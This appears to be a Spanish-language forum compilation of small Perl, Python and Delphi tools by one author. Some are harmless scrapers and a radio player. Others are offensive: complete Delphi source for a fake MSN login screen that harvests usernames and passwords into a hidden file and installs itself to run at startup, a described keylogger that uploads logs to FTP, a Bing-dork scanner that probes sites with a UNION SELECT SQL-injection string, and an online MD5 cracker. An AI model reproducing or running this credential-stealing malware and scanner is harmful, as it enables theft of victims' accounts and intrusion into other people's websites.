chomp( my $song = <stdin> );

$song =~ s/ /-/;

print "\n[+] Searching ...\n\n";

my $code = toma( "http://mp3skull.com/mp3/" . $song . ".html" );

chomp $code;

if ( $code =~ /Sorry, no results found for/ ) {
    print "\n[-] Not Found\n";
    copyright();
}

my @nombres;
my @datas;
my @links;

while ( $code =~ /<div style="font-size:15px;"><b>(.*)<\/b><\/div>/mig ) {
    my $nombre = $1;

    #print "name : $nombre\n";
    push( @nombres, $nombre );
}

while ( $code =~ /<!-- info mp3 here -->\s+(.*?)<\/div>/migs ) {
    my $data = $1;
    $data =~ s/<br \/>/ /;
    $data =~ s/<br \/>/ /;

    #print "data : $data\n";
    push( @datas, $data );
}

while ( $code =~ /<a href=\"(.*)\.mp3\"/mig ) {
    my $link = $1 . ".mp3";

    #print "link : $link\n";
    push( @links, $link );
}

my $encontrados = int(@nombres) - 1;

for my $aca ( 0 .. $encontrados ) {
    print "[Song $aca] : $nombres[$aca]\n";
    print "[Data] : $datas[$aca]\n";
    print "[Link] : $links[$aca]\n\n";
}

print "\n[?] Number : ";
chomp( my $number = <stdin> );

print "\n[+] Downloading ...\n";

now( $links[$number] );

print "\n[+] Finished\n";

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#             MP3 Downloader 0.1              #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub now {

    my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );

    if ( $path =~ /(.*)\/(.*)$/ ) {
        my $file = $2;
        if ( download( $_[0], $file ) ) {
        }
    }
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?


Un ejemplo de uso

Código [Seleccionar] Expandir



#=============================================#
#             MP3 Downloader 0.1              #
#---------------------------------------------#
# Written By Doddy H                          #
# Email: lepuke[at]hotmail[com]               #
# Website: doddyhackman.webcindario.com       #
#---------------------------------------------#
# The End ?                                   #
#=============================================#


[?] Song : bones now

[+] Searching ...

[Song 0] : Discovery Now - bionic bones mp3
[Data] : 256 kbps 1:30 2.79 mb
[Link] : http://www.whro.org/home/html/podcasts/discoverynow/041408.mp3

[Song 1] : Sean Bones - 'Here Now' mp3
[Data] : 128 kbps 3:28 3.19 mb
[Link] : http://serve.castfire.com/audio/878039/sean-bones-here-now_2012-02-23-1
74939.128.mp3

[Song 2] : Discovery Now - bionic bones mp3
[Data] : 256 kbps  00:01:30 2.8 mb
[Link] : http://whro.org/home/html/podcasts/discoverynow/041408.mp3

[Song 3] : Sean Bones - Here Now mp3
[Data] : 5.02 mb
[Link] : http://www.hulkshare.com/dl/4t42l4kxi811/sean_bones_-_here_now.mp3

[Song 4] : Fuego Ft. Amara - Lo Que Quiero (Prod. By Bones, Now & Laterz) (Www.S
tiloCaro.Com) mp3
[Data] : 4.43 mb
[Link] : http://www.hulkshare.com/dl/w86wxq8bl0n4/fuego_ft._amara_-_lo_que_quier
o_%28prod._by_bones%2c_now_%26_laterz%29.mp3

[Song 5] : Sean Bones - Here Now mp3
[Data] : 160 kbps 3:27 3.95 mb
[Link] : http://myspoonful.com/wp-content/uploads/Sean-Bones-Here-Now.mp3

[Song 6] : Frankie Bones - Bonesbreaks Vol. 2 (B2) On The Beat Now-freestyle na
veia mp3
[Data] : 4:40 mins 6.41 mb
[Link] : http://dc203.4shared.com/img/564370108/97ff8470/dlink__2Fdownload_2FS4X
eLchH_3Ftsid_3D20121127-94941-8934f180/preview.mp3


[?] Number : 1

[+] Downloading ...

[+] Finished


-- == (C) Doddy Hackman 2012 == --



Un simple script para bajar los iconos que quieran , los iconos bajados se guardan en un carpeta con el nombre buscado.

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#FindIcons 0.1
#Coded By Doddy H

use LWP::UserAgent;
use URI::Split qw(uri_split);
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();

print "[?] Search : ";
chomp( my $se = <stdin> );

$se =~ s/ /-/;

my $code = toma( "http://findicons.com/search/" . $se );

if ( $code =~ /<div class="box_info left">(.*)<\/div>/ ) {
    print "\n[+] $1\n";

    unless ( -d $se ) {
        mkdir( $se, "777" );
    }

    chdir $se;

}
else {
    print "\n[-] Not Found\n";
    copyright();
}

print "\n[?] Pages : ";

chomp( my $pages = <stdin> );

print "\n[+] Downloading ...\n\n";

for my $pages ( 1 .. $pages ) {

    my $code = toma("http://findicons.com/search/$se/$pages");

    while ( $code =~
        /<img src="http:\/\/png-(.*).findicons.com\/files\/(.*)" alt/mig )
    {
        my $link = "http://png-" . $1 . ".findicons.com/files/" . $2;

        now($link);

    }

}

print "[+] Finished ...\n";

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#              FindIcons 0.1                  #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub now {

    my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );

    if ( $path =~ /(.*)\/(.*)$/ ) {
        my $file = $2;
        if ( download( $_[0], $file ) ) {
        }
    }
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?


Aca les traigo la nueva version de este Fake MSN hecho en delphi.

Con las siguientes opciones :

• El programa al cargarse se mueve automaticamente a la carpeta de windows
  
• El programa se ejecuta cuando Windows se inicia
  
• Se ocultan los archivos relacionados al programa
  
• Con poner "doddy" en user y "hackman" en pass en el programa se cargan los logs ocultos
  
  Una imagen
  
  
  
  El codigo
  
  
  Código (delphi) [Seleccionar] Expandir
  
{
Fake MSN 0.2
Coded By Doddy H
}

unit fake;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, jpeg, ExtCtrls, StdCtrls, Registry;

type
  TForm1 = class(TForm)
    Image1: TImage;
    Edit1: TEdit;
    Edit2: TEdit;
    Image2: TImage;
    procedure Edit1Click(Sender: TObject);
    procedure Edit2Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure Image2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Edit1Click(Sender: TObject);
begin
  Edit1.Text := '';
end;

procedure TForm1.Edit2Click(Sender: TObject);
begin
  Edit2.Text := '';
  Edit2.PasswordChar := '*';
end;

procedure TForm1.FormCreate(Sender: TObject);

var nombrereal: string;
  rutareal: string;
  yalisto: string;
  her: TRegistry;

begin

  nombrereal := ExtractFileName(ParamStr(0));
  rutareal := ParamStr(0);
  yalisto := 'C:\WINDOWS\' + nombrereal;

  MoveFile(Pchar(rutareal), Pchar(yalisto));

  her := TRegistry.Create;
  her.RootKey := HKEY_LOCAL_MACHINE;

  her.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', FALSE);
  her.WriteString('uber', yalisto);
  her.Free;

  SetFileAttributes(PChar(yalisto), FILE_ATTRIBUTE_HIDDEN);
  SetFileAttributes(PChar('C:/windows/datos.txt'), FILE_ATTRIBUTE_HIDDEN);

end;

procedure TForm1.Image2Click(Sender: TObject);

var archivo: TextFile;
  ruta: string;

begin

  if (Edit1.Text = 'doddy') and (Edit2.Text = 'hackman') then
  begin
    WinExec(PChar('notepad c:/windows/datos.txt'), SW_SHOW);
  end
  else
  begin

    if Edit1.Text = '' then
    begin
      ShowMessage('Escribe tu Id. de Window Live ID en este formato: tu nombre@ejemplo.com');
    end;
    if Edit2.Text = '' then
    begin
      ShowMessage('Escribe tu contraseña');
    end
    else
    begin
      if Edit2.Text = 'Escribe aqui tu contraseña' then
      begin
        ShowMessage('Escribe tu contraseña');
      end
      else
      begin
        ruta := 'c:/windows/datos.txt'; //mod
        if FileExists(ruta) then
        begin
          AssignFile(archivo, ruta);
          FileMode := fmOpenWrite;
          Append(archivo);
          Writeln(archivo, '[user] : ' + Edit1.Text + ' [password] : ' + Edit2.Text);
          CloseFile(archivo);
          Application.MessageBox('Se ha producido un error , es necesario reiniciar Window Live Messenger', 'Window Live Messenger', MB_OK);
          Form1.Close;
        end
        else
        begin
          AssignFile(archivo, ruta);
          FileMode := fmOpenWrite;
          ReWrite(archivo);
          Writeln(archivo, '[user] : ' + Edit1.Text + ' [password] : ' + Edit2.Text);
          CloseFile(archivo);
          Application.MessageBox('Se ha producido un error , es necesario reiniciar Window Live Messenger', 'Window Live Messenger', MB_OK);
          Form1.Close;
        end;
      end;
    end;
  end;

end;

end.

// The End ?

  
  Si quieren bajar el proyecto + el programa compilado lo pueden hacer de aca.
  
  Cualquier sugerencia o error diganlo para mejorar (porque el programa en si no me convence xDD).
  
  

Lo mismo que el otro buscador pero esta vez para CS 1.6

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Counter Strike 1.6 Servers List
#Version 0.1
#Coded By Doddy H

use LWP::UserAgent;
use Cwd;
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my @founds;
my @founds_final;

head();

print "[+] Pages (1-899) : ";
chomp( my $pag = <stdin> );

print "\n\n[+] Searching Servers ....\n";

for my $count ( 1 .. $pag ) {

    my $code =
      toma( "http://www.gametracker.com/search/cs/?searchipp=50&searchpge="
          . $count );

    my @found = $code =~ m/(\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}:\d+)/g;

    for (@found) {
        push( @founds_final, $_ );
    }

}

my @founds_final = repes(@founds_final);

print "\n[+] Servers Found : " . int(@founds_final);

my $ruta_logs = getcwd() . "/" . "cs_servers.txt";

if ( -f $ruta_logs ) {
    unlink($ruta_logs);
}

open( LOGS, ">>cs_servers.txt" );

for (@founds_final) {
    print LOGS $_ . "\n";
}

close LOGS;

print "\n\n[+] All results are stored in : $ruta_logs\n";

if ( -f $ruta_logs ) {
    system($ruta_logs);
}

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#       Counter Strike 1.6 Servers List       #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?


Este script se encarga de buscar servers del juego Half Life para entrar y jugar , los resultados se guardan en un archivo de texto.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Half Life Servers List 0.1
#Coded By Doddy H

use LWP::UserAgent;
use Cwd;
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my @founds;
my @founds_final;

head();

print "[+] Searching Servers ....\n";

for my $count ( 1 .. 2 ) {

    my $code =
      toma( "http://www.game-monitor.com/search.php?game=valve&pg="
          . $count
          . "&num=100" );

    my @found = $code =~ m/(\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}:\d+)/g;

    for (@found) {
        push( @founds_final, $_ );
    }

}

my @founds_final = repes(@founds_final);

print "\n[+] Servers Found : " . int(@founds_final);

my $ruta_logs = getcwd() . "/" . "hl_servers.txt";

if ( -f $ruta_logs ) {
    unlink($ruta_logs);
}

open( LOGS, ">>hl_servers.txt" );

for (@founds_final) {
    print LOGS $_ . "\n";
}

close LOGS;

print "\n\n[+] All results are stored in : $ruta_logs\n";

if ( -f $ruta_logs ) {
    system($ruta_logs);
}

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#         Half Life Servers List 0.1          #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?


Un simple keylogger en Perl con las siguientes opciones :

• Capturar teclas reconociendo mayusculas y minusculas asi como signos
  
• Capturar ventanas activas
  
• Capturar el escritorio de windows cada cierto tiempo o cada click del mouse
  
• Oculta archivos relacionados al programa
  
• Compresion de los logs a zip
  
• Logs ordenados en un archivo HTML
  
• Subir logs a un servidor FTP marcado
  
• Ejecutarse cuando se inicie Windows
  
  Una imagen del generador del keylogger
  
  
  
  El codigo esta aca.
  
  Tambien le doy las gracias a Mdh3ll que creo el primer keylogger en perl y del cual me base en parte para hacer este programa.
  
  

Un simple script para buscar en bing paginas vulnerables a SQLi.



El codigo

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#BingHack Tool 0.1
#Coded By Doddy H

import sys,urllib2,re
from PyQt4 import QtCore,QtGui

def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()

def sql(webs):
for web in webs :
  if re.findall("=",web):
   web = re.split("=",web)
   web = web[0]+"="
   app.processEvents()
   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     new.console.appendPlainText("[SQLI] : "+web)
   except:
    pass

def limpiar(pag):

limpia = []
for p in pag:
  if p not in limpia:
   limpia.append(p)
return limpia

def buscar(dork,count):

pag = []
s = 10 

new.console.appendPlainText("[+] Searching pages ....")

while s <= int(count):
  try:
   code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
   d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
   s += 10
   for a in d:
    pag.append(a)
  except:
   pass

new.console.appendPlainText("[+] Cleaning ...")

pag = limpiar(pag)
return pag

def scan():

new.console.clear()
pages = buscar(new.dork.text(),new.pages.text())
new.console.appendPlainText("[+] Scanning ...\n")
sql(pages)
new.console.appendPlainText("\n[+] Finished")

app = QtGui.QApplication(sys.argv)

new = QtGui.QWidget()

new.setWindowTitle("BingHack Tool 0.1 || Coded By Doddy H")
new.resize(450,470)
new.setStyleSheet("QWidget {background-color: #000000;color: #FF8000}")

new.label1 = QtGui.QLabel("Dork : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label1.setGeometry(30,23,80,20)

new.dork = QtGui.QLineEdit(new)
new.dork.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
new.dork.setGeometry(90,23,200,25)

new.label1 = QtGui.QLabel("Pages : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label1.setGeometry(30,60,80,20)

new.pages = QtGui.QLineEdit(new)
new.pages.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
new.pages.setGeometry(100,60,50,25)

new.search = QtGui.QPushButton("Scan",new)
new.search.setGeometry(305,22,110,28)
new.search.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")

new.label2 = QtGui.QLabel("Console",new)
new.label2.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label2.setGeometry(185,110,70,20)

new.console = QtGui.QPlainTextEdit(new)
new.console.setGeometry(50,150,350,300)
new.console.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")

new.connect(new.search,QtCore.SIGNAL("clicked()"),scan)

new.show()

sys.exit(app.exec_())

# The End ?


Un simple script para crackear un hash MD5 mediante una pagina que ofrece ese servicio.

Una imagen de como quedo



El codigo

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#MD5 Crack Online 0.1
#Coded By Doddy H
#Test with 098f6bcd4621d373cade4e832627b4f6

import sys,urllib2,re
from PyQt4 import QtCore,QtGui

def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()

def crackit(hash):
if(len(hash) == 32):
 code = toma("http://md5.hashcracking.com/search.php?md5="+hash)
 if (re.findall("Cleartext of "+hash+" is (.*)",code)):
  rex = re.findall("Cleartext of "+hash+" is (.*)",code)
  return rex[0]
 else:
  return "Not Found"
else:
 print "Hash invalid"

def crack():
new.result.setText(crackit(str(new.md5.text())))

app = QtGui.QApplication(sys.argv)

new = QtGui.QWidget()

new.setWindowTitle("MD5 Crack Online 0.1 || Coded By Doddy H")
new.resize(800,70)
new.setStyleSheet("QWidget {background-color: #000000;color: #00FFFF}")

new.label1 = QtGui.QLabel("MD5 : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #00FFFF;font: normal 17px Verdana}")
new.label1.setGeometry(20,23,80,20)

new.md5 = QtGui.QLineEdit(new)
new.md5.setStyleSheet("QWidget {background-color: #000000; color: #00FFFF;border: 2px solid #00FFFF}")
new.md5.setGeometry(75,23,247,25)

new.label2 = QtGui.QLabel("Result : ",new)
new.label2.setStyleSheet("QWidget {background-color: #000000;color: #00FFFF;font: normal 17px Verdana}")
new.label2.setGeometry(335,23,80,20)

new.result = QtGui.QLineEdit(new)
new.result.setStyleSheet("QWidget {background-color: #000000; color: #00FFFF;border: 2px solid #00FFFF}")
new.result.setGeometry(410,23,230,25)

new.search = QtGui.QPushButton("Crack",new)
new.search.setGeometry(660,23,120,28)
new.search.setStyleSheet("QWidget {background-color: #000000; color: #00FFFF;border: 2px solid #00FFFF}")

new.connect(new.search,QtCore.SIGNAL("clicked()"),crack)

new.show()

sys.exit(app.exec_())

# The End ?


Estaba harto de escuchar siempre la misma cancion asi que mejore este script para poder escuchar musica con los siguientes generos.

• Rock'n'Roll
  
• Pop
  
• Ambient
  
• Trance
  
• House
  
• Y otros mas .......
  
  
  Aclaro que necesitan bajar el mplayer , esta el link de descarga en el script , una vez que lo tengan descargado y descomprimido creen una carpeta llamada
  "mplayer" y copian todos los archivos del archivo descomprimido en la carpeta recien creada , todo esto tiene que ser en el mismo directorio donde este el script.
  
  El codigo es el siguiente
  
  
  Código (perl) [Seleccionar] Expandir
  
#!usr/bin/perl
#Radio X
#Version 0.2
#Coded By Doddy H
#
#Download : http://www.mplayerhq.hu/MPlayer/releases/win32/MPlayer-mingw32-1.0rc2.zip
#

use Cwd;

my @emisoras = (

    {},

    {

        "nombre" => "Absolute Classic Rock (Broadband)",
        "genero" => "Rock'n'Roll",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vcbb"

    },

    {

        "nombre" => "Absolute Classic Rock (Modem)",
        "genero" => "Rock'n'Roll",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vc"

    },

    {

        "nombre" => "Absolute Radio (Broadband)",
        "genero" => "Pop",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vrbb"

    },

    {

        "nombre" => "Absolute Radio (Modem)",
        "genero" => "Pop",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vr"

    },

    {

        "nombre" => "Absolute Xtreme (Broadband)",
        "genero" => "Modern Rock",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vxbb"

    },

    {

        "nombre" => "Absolute Xtreme (Modem)",
        "genero" => "Modern Rock",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vx"

    },

    {

        "nombre" => "HBR1.com - Dream Factory",
        "genero" => "Ambient",
        "link"   => "http://ubuntu.hbr1.com:19800/ambient.ogg"

    },

    {

        "nombre" => "HBR1.com - I.D.M. Tranceponder",
        "genero" => "Trance",
        "link"   => "http://ubuntu.hbr1.com:19800/trance.ogg"

    },

    {

        "nombre" => "HBR1.com - Tronic Lounge",
        "genero" => "House",
        "link"   => "http://ubuntu.hbr1.com:19800/tronic.ogg"

    },

    {

        "nombre" => "NRK Alltid Klassisk (Norway)",
        "genero" => "Desconocido",
        "link" =>
          "http://media.hiof.no/streams/m3u/nrk-alltid-klassisk-172.ogg.m3u"

    },

    {

        "nombre" => "NRK Alltid Nyheter (Norway)",
        "genero" => "Desconocido",
        "link" =>
          "http://media.hiof.no/streams/m3u/nrk-alltid-nyheter-172.ogg.m3u"

    },

    {

        "nombre" => "NRK mP3 (Norway)",
        "genero" => "Desconocido",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-mpetre-172.ogg.m3u"

    },

    {

        "nombre" => "NRK P1 (Norway)",
        "genero" => "General",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-p1-172.ogg.m3u",

    },

    {

        "nombre" => "NRK P2 (Norway)",
        "genero" => "General",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-p2-172.ogg.m3u"

    },

    {

        "nombre" => "NRK P3 (Norway)",
        "genero" => "General",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-petre-172.ogg.m3u"

    },

    {

        "nombre" => "WKNC 88.1 FM (NC State) (High Quality)",
        "genero" => "Music",
        "link"   => "http://wknc.sma.ncsu.edu:8000/wknchq.ogg.m3u"

    },

    {

        "nombre" => "WKNC 88.1 FM (NC State) (Low Quality)",
        "genero" => "Music",
        "link"   => "http://wknc.sma.ncsu.edu:8000/wkncmq.ogg.m3u"

    }

);

$SIG{INT} = \&retorno;

chdir( getcwd() . "/mplayer/" );

menu();

sub retorno {
    print "\n\n[+] Press any key for return to the menu\n\n";
    <stdin>;
    menu();
}

sub menu {

    head();

    for my $em ( 1 .. @emisoras - 1 ) {

        print "\n[+] Number : " . $em . "\n";
        print "[+] Name : " . $emisoras[$em]->{nombre} . "\n";
        print "[+] Station : " . $emisoras[$em]->{genero} . "\n";

    }

    print "\n\n[+] Option : ";
    chomp( my $op = <stdin> );

    if ( $op =~ /\d+/ ) {
        system("mplayer $emisoras[$op]->{link}");
    }

    copyright();

}

sub head {

    clean();

    print qq(


@@@@@     @    @@@@    @   @@@@     @     @
@    @    @    @   @   @  @    @    @     @
@    @   @ @   @    @  @  @    @     @   @
@    @   @ @   @    @  @  @    @      @ @ 
@@@@@   @   @  @    @  @  @    @       @   
@    @  @   @  @    @  @  @    @      @ @ 
@    @  @@@@@  @    @  @  @    @     @   @
@    @ @     @ @   @   @  @    @    @     @
@    @ @     @ @@@@    @   @@@@     @     @



);

}

sub copyright {
    print "\n\n-- == (C) Doddy Hackman 2012 == --\n\n";
    <stdin>;
    exit(1);
}

sub clean {
    my $os = $^O;
    if ( $os =~ /Win32/ig ) {
        system("cls");
    }
    else {
        system("clear");
    }
}

#The End ?

  
  Ejemplo de uso
  
  
  Código [Seleccionar] Expandir
  



@@@@@     @    @@@@    @   @@@@     @     @
@    @    @    @   @   @  @    @    @     @
@    @   @ @   @    @  @  @    @     @   @
@    @   @ @   @    @  @  @    @      @ @
@@@@@   @   @  @    @  @  @    @       @
@    @  @   @  @    @  @  @    @      @ @
@    @  @@@@@  @    @  @  @    @     @   @
@    @ @     @ @   @   @  @    @    @     @
@    @ @     @ @@@@    @   @@@@     @     @




[+] Number : 1
[+] Name : Absolute Classic Rock (Broadband)
[+] Station : Rock'n'Roll

[+] Number : 2
[+] Name : Absolute Classic Rock (Modem)
[+] Station : Rock'n'Roll

[+] Number : 3
[+] Name : Absolute Radio (Broadband)
[+] Station : Pop

[+] Number : 4
[+] Name : Absolute Radio (Modem)
[+] Station : Pop

[+] Number : 5
[+] Name : Absolute Xtreme (Broadband)
[+] Station : Modern Rock

[+] Number : 6
[+] Name : Absolute Xtreme (Modem)
[+] Station : Modern Rock

[+] Number : 7
[+] Name : HBR1.com - Dream Factory
[+] Station : Ambient

[+] Number : 8
[+] Name : HBR1.com - I.D.M. Tranceponder
[+] Station : Trance

[+] Number : 9
[+] Name : HBR1.com - Tronic Lounge
[+] Station : House

[+] Number : 10
[+] Name : NRK Alltid Klassisk (Norway)
[+] Station : Desconocido

[+] Number : 11
[+] Name : NRK Alltid Nyheter (Norway)
[+] Station : Desconocido

[+] Number : 12
[+] Name : NRK mP3 (Norway)
[+] Station : Desconocido

[+] Number : 13
[+] Name : NRK P1 (Norway)
[+] Station : General

[+] Number : 14
[+] Name : NRK P2 (Norway)
[+] Station : General

[+] Number : 15
[+] Name : NRK P3 (Norway)
[+] Station : General

[+] Number : 16
[+] Name : WKNC 88.1 FM (NC State) (High Quality)
[+] Station : Music

[+] Number : 17
[+] Name : WKNC 88.1 FM (NC State) (Low Quality)
[+] Station : Music


[+] Option : 7
MPlayer 1.0rc2-4.2.1 (C) 2000-2007 MPlayer Team
CPU: AMD Sempron(tm) 140 Processor (Family: 16, Model: 6, Stepping: 2)
CPUflags:  MMX: 1 MMX2: 1 3DNow: 1 3DNow2: 1 SSE: 1 SSE2: 1
Compiled with runtime CPU detection.

Playing http://ubuntu.hbr1.com:19800/ambient.ogg.
Resolving ubuntu.hbr1.com for AF_INET...
Connecting to server ubuntu.hbr1.com[93.94.83.51]: 19800...
Cache size set to 320 KBytes
Cache fill: 15.00% (49152 bytes)
[Ogg] stream 0: audio (Vorbis), -aid 0
Ogg file format detected.
Clip info:
Artist: A.C.E. (chillgressive tunes)
Name: Acid Chill Experience (DJ-Set, exclusive 4 hbr1.com)
Album: hbr1.com
Genre: Ambient
Track: 1
==========================================================================
